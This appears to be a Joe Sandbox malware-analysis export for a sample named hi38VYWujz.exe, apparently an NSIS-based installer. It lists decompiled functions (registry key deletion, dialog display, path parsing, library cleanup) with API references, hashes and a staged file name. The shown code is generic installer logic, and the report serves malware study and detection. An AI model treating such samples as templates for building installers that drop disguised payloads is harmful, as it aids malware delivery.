Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: 96ba7b99f7925edb235d18d004fc1fe51c5fb87b1b333c4bf7b8a2937e57358f
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: 44D05E21101924AAC1117B448C04EDF72ACAE45344342007AF241B30A1CB78295286FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E004060CC(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E00406639(3);
					if(_t28 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}

0x00402d35
0x00402d3e
0x00402d47
0x00402d53
0x00402d5a
0x00402d7e
0x00402d64
0x00402d66
0x00402db9
0x00000000
0x00402dc1
0x00402d75
0x00402d7a
0x00402d7c
0x00000000
0x00000000
0x00402d7c
0x00402d98
0x00402da0
0x00402da7
0x00000000
0x00402dca
0x00000000
0x00402db2
0x00402dd4

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D98
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB9

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
Instruction ID: 13ce92619e22af03a8d5f803c99d3fa2c3d1cb872fac5522cbaad6f830247a1d
Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
Instruction Fuzzy Hash: 94116A32540509FBEF129F90CE09BEE7B69EF58350F110036B905B60E0E7B5DE21AB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E5D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x7976d8; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7a8a30;
						if(_t2 >  *0x7a8a30) {
							_t3 = CreateDialogParamW( *0x7a8a20, 0x6f, 0, E00402DD7, 0);
							 *0x7976d8 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406675(0);
					}
				} else {
					_t6 =  *0x7976d8; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x7976d8 = 0;
					return _t6;
				}
			}

0x00402e64
0x00402e7e
0x00402e84
0x00402e8e
0x00402e94
0x00402e9a
0x00402eab
0x00402eb4
0x00000000
0x00402eb9
0x00402ec0
0x00402e86
0x00402e8d
0x00402e8d
0x00402e66
0x00402e66
0x00402e6d
0x00402e70
0x00402e70
0x00402e76
0x00402e7d
0x00402e7d

APIs

DestroyWindow.USER32(00000000,00000000,0040303D,?,?,00000006,00000008,0000000A), ref: 00402E70
GetTickCount.KERNEL32 ref: 00402E8E
CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
Instruction ID: 7afe0c5cdde3553510745d2e994aff72f2021582eecc7c7a9da0eee8c5fdd21f
Opcode Fuzzy Hash: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
Instruction Fuzzy Hash: B3F05E30966A21EBC6616B24FE8C99B7B64AB44B41B15887BF041B11B8DA784891CBDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405C38(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040625F(0x7a4728, _a4);
				_t21 = E00405BDB(0x7a4728);
				if(_t21 != 0) {
					E004064F3(_t21);
					if(( *0x7a8a3c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4728 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4728);
							_push(0x7a4728);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004065A2();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B7C(0x7a4728);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B30();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405c44
0x00405c4f
0x00405c53
0x00405c5a
0x00405c66
0x00405c76
0x00405c78
0x00405c90
0x00405c91
0x00405c98
0x00405c99
0x00000000
0x00000000
0x00405c7c
0x00405c83
0x00405c8b
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c83
0x00405c9b
0x00000000
0x00405caf
0x00405c68
0x00405c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c6e
0x00405c55
0x00000000

APIs

Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C

Part of subcall function 00405BDB: CharNextW.USER32(?,?,Scienza\Pulmobranchiate.Rid207,?,00405C4F,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,?,?,75ED3420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75ED3420,00000000), ref: 00405BE9
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06

lstrlenW.KERNEL32(Scienza\Pulmobranchiate.Rid207,00000000,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,?,?,75ED3420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75ED3420,00000000), ref: 00405C91
GetFileAttributesW.KERNEL32(Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,00000000,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,?,?,75ED3420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75ED3420), ref: 00405CA1

Strings

Scienza\Pulmobranchiate.Rid207, xrefs: 00405C3E, 00405C43, 00405C49, 00405C8A, 00405C90, 00405C98, 00405CA0

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: Scienza\Pulmobranchiate.Rid207
API String ID: 3248276644-3418151385
Opcode ID: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
Instruction ID: 07588a96ba491492048338639ced47dd8f75e02a3aa2c86f807570fea5ede87b
Opcode Fuzzy Hash: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
Instruction Fuzzy Hash: 3FF0D125008F1115E72233361D49EAF2664CE96360B1A023FF952B12D1DB3C99939C6E

Uniqueness

Uniqueness Score: -1.00%

Function 004038D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038D8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79fee4; // 0x93eef8
				_t3 = E004038BD(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79fee4 =  *0x79fee4 & 0x00000000;
				return _t3;
			}

0x004038d9
0x004038e1
0x004038e8
0x004038eb
0x004038eb
0x004038ed
0x004038f2
0x004038f9
0x004038ff
0x00403903
0x00403904
0x0040390c

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75ED3420,004038B0,004036C6,00000006,?,00000006,00000008,0000000A), ref: 004038F2
GlobalFree.KERNEL32(0093EEF8), ref: 004038F9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038EA

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction ID: 0fbf8731d8bad765cb9f744f6f02bb9fbed9ce401ee6a58d62f233990fc3ff23
Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction Fuzzy Hash: 31E01D334011205BC6115F55FD0475A77685F44B36F15407BF9847717147B45C535BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405B7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405B7C(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405b7d
0x00405b87
0x00405b8a
0x00405b90
0x00405b91
0x00405b92
0x00405b9a
0x00000000
0x00000000
0x00000000
0x00405b9a
0x00405b9c
0x00405ba4

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hi38VYWujz.exe,C:\Users\user\Desktop\hi38VYWujz.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B82
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hi38VYWujz.exe,C:\Users\user\Desktop\hi38VYWujz.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B92

Strings

C:\Users\user\Desktop, xrefs: 00405B7C

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: 52ec536bf7c92ef41efc45dde312f484f3c591b0d09bb1e57af7322ca826a5e1
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: 85D05EB24009209AD3126704DC00DAF77B8EF11310746446AE840A6166D7787C818AAC

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x100010e6
0x100010f0
0x100010ff
0x1000110e
0x10001119
0x1000111c
0x1000112b
0x1000112f
0x10001131
0x100011d8
0x100011de
0x10001137
0x10001138
0x10001138
0x1000113d
0x1000113e
0x10001140
0x10001143
0x1000120d
0x10001210
0x100011b0
0x100011b6
0x100011bf
0x100011c4
0x100011c7
0x00000000
0x100011c7
0x10001212
0x10001214
0x10001196
0x1000119d
0x100011a5
0x00000000
0x100011a5
0x10001161
0x10001162
0x1000116a
0x10001177
0x1000117f
0x10001188
0x1000118d
0x1000118d
0x00000000
0x10001162
0x10001149
0x100011df
0x100011df
0x100011e6
0x100011f3
0x100011f8
0x100011fb
0x10001203
0x10001205
0x10001205
0x00000000
0x100011e6
0x1000114f
0x10001152
0x00000000
0x00000000
0x10001158
0x1000115b
0x100011ac
0x00000000
0x100011ac
0x1000115d
0x1000115f
0x10001192
0x00000000
0x10001192
0x00000000
0x100011c9
0x100011c9
0x100011d3
0x00000000
0x100011d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000006.00000002.45232552637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.45232522122.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232596193.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232631278.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_hi38VYWujz.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB6 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CB6(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405cc6
0x00405cc8
0x00405ccb
0x00405cf7
0x00405cd0
0x00405cd9
0x00405cde
0x00405ce9
0x00405cec
0x00405d08
0x00405cee
0x00405cf5
0x00000000
0x00405cf5
0x00405d01
0x00405d05
0x00405d05
0x00405cff
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC6
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CDE
CharNextA.USER32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF8

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 3ccce89ec89fcd17ace6fe24ed26798b8253689363ac01c92f586b0f3661b096
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 81F0F631204958FFC7029FA8DD04D9FBBA8EF16354B2540BAE840F7211D634EE01ABA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: hi38VYWujz.exePID: 7828, Parent PID: 6396COMMON

Execution Graph

Execution Coverage:	0%
